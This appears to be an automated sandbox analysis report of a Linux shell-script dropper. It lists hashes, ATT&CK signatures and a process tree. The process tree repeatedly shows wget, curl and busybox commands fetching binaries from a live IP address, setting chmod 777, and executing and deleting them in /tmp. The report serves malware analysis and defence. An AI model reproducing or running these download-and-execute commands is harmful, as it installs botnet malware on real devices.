Analysis
-
max time kernel
51s -
max time network
56s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
20/11/2024, 02:53
General
-
Target
77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh
-
Size
10KB
-
MD5
928ac3545f37f454486c6da121b1d8ad
-
SHA1
3046c6680906db848c9b0214b81114b98b1e3b37
-
SHA256
77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb
-
SHA512
241bccfebc8ff76545fe467db32188c4133a7ba498309511c1459a346da7cef42204de16806c6bf7a577ddab03058f539617394036727484a1e640dc90764e8e
-
SSDEEP
192:mpJrZ7BB997eSM7y+WT79/o9/Y9/h/S/+/kaz0z8zTA8aTXHdUdcddCmFXeXSX5X:AZx9E68h6CdCmVG65iCpkzaiHDg6CdC6
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 24 IoCs
-
Checks CPU configuration 1 TTPs 24 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads runtime system information 48 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 24 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh1⤵
-
/bin/rm/bin/rm bins.sh2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf12⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf12⤵
-
-
/bin/chmodchmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf12⤵
- File and Directory Permissions Modification
-
-
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf12⤵
- Executes dropped EXE
-
-
/bin/rmrm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf12⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU2⤵
-
-
/bin/chmodchmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU2⤵
- File and Directory Permissions Modification
-
-
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU2⤵
- Executes dropped EXE
-
-
/bin/rmrm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY12⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY12⤵
-
-
/bin/chmodchmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY12⤵
- File and Directory Permissions Modification
-
-
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY12⤵
- Executes dropped EXE
-
-
/bin/rmrm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY12⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx72⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx72⤵
-
-
/bin/chmodchmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx72⤵
- File and Directory Permissions Modification
-
-
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7./f4er80WdZpB65CEraApSmbUBPranpIfNx72⤵
- Executes dropped EXE
-
-
/bin/rmrm f4er80WdZpB65CEraApSmbUBPranpIfNx72⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT2⤵
-
-
/bin/chmodchmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT2⤵
- File and Directory Permissions Modification
-
-
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT2⤵
- Executes dropped EXE
-
-
/bin/rmrm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC2⤵
-
-
/bin/chmodchmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC2⤵
- File and Directory Permissions Modification
-
-
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC2⤵
- Executes dropped EXE
-
-
/bin/rmrm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs42⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs42⤵
-
-
/bin/chmodchmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs42⤵
- File and Directory Permissions Modification
-
-
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs42⤵
- Executes dropped EXE
-
-
/bin/rmrm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs42⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f2⤵
-
-
/bin/chmodchmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f2⤵
- File and Directory Permissions Modification
-
-
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f2⤵
- Executes dropped EXE
-
-
/bin/rmrm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY2⤵
-
-
/bin/chmodchmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY2⤵
- File and Directory Permissions Modification
-
-
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY2⤵
- Executes dropped EXE
-
-
/bin/rmrm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl2⤵
-
-
/bin/chmodchmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl2⤵
- File and Directory Permissions Modification
-
-
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl2⤵
- Executes dropped EXE
-
-
/bin/rmrm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw2⤵
- System Network Configuration Discovery
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw2⤵
- File and Directory Permissions Modification
-
-
/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/bin/rmrm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY2⤵
-
-
/bin/chmodchmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY2⤵
- File and Directory Permissions Modification
-
-
/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY2⤵
- Executes dropped EXE
-
-
/bin/rmrm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh2⤵
-
-
/bin/chmodchmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh2⤵
- File and Directory Permissions Modification
-
-
/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh2⤵
- Executes dropped EXE
-
-
/bin/rmrm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq2⤵
-
-
/bin/chmodchmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq2⤵
- File and Directory Permissions Modification
-
-
/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq2⤵
- Executes dropped EXE
-
-
/bin/rmrm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf12⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf12⤵
-
-
/bin/chmodchmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf12⤵
- File and Directory Permissions Modification
-
-
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf12⤵
- Executes dropped EXE
-
-
/bin/rmrm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf12⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU2⤵
-
-
/bin/chmodchmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU2⤵
- File and Directory Permissions Modification
-
-
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU2⤵
- Executes dropped EXE
-
-
/bin/rmrm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY12⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY12⤵
-
-
/bin/chmodchmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY12⤵
- File and Directory Permissions Modification
-
-
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY12⤵
- Executes dropped EXE
-
-
/bin/rmrm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY12⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx72⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx72⤵
-
-
/bin/chmodchmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx72⤵
- File and Directory Permissions Modification
-
-
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7./f4er80WdZpB65CEraApSmbUBPranpIfNx72⤵
- Executes dropped EXE
-
-
/bin/rmrm f4er80WdZpB65CEraApSmbUBPranpIfNx72⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT2⤵
-
-
/bin/chmodchmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT2⤵
- File and Directory Permissions Modification
-
-
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT2⤵
- Executes dropped EXE
-
-
/bin/rmrm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC2⤵
-
-
/bin/chmodchmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC2⤵
- File and Directory Permissions Modification
-
-
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC2⤵
- Executes dropped EXE
-
-
/bin/rmrm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs42⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs42⤵
-
-
/bin/chmodchmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs42⤵
- File and Directory Permissions Modification
-
-
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs42⤵
- Executes dropped EXE
-
-
/bin/rmrm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs42⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f2⤵
-
-
/bin/chmodchmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f2⤵
- File and Directory Permissions Modification
-
-
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f2⤵
- Executes dropped EXE
-
-
/bin/rmrm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY2⤵
-
-
/bin/chmodchmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY2⤵
- File and Directory Permissions Modification
-
-
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY2⤵
- Executes dropped EXE
-
-
/bin/rmrm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl2⤵
-
-
/bin/chmodchmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl2⤵
- File and Directory Permissions Modification
-
-
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl2⤵
- Executes dropped EXE
-
-
/bin/rmrm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw2⤵
- System Network Configuration Discovery
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7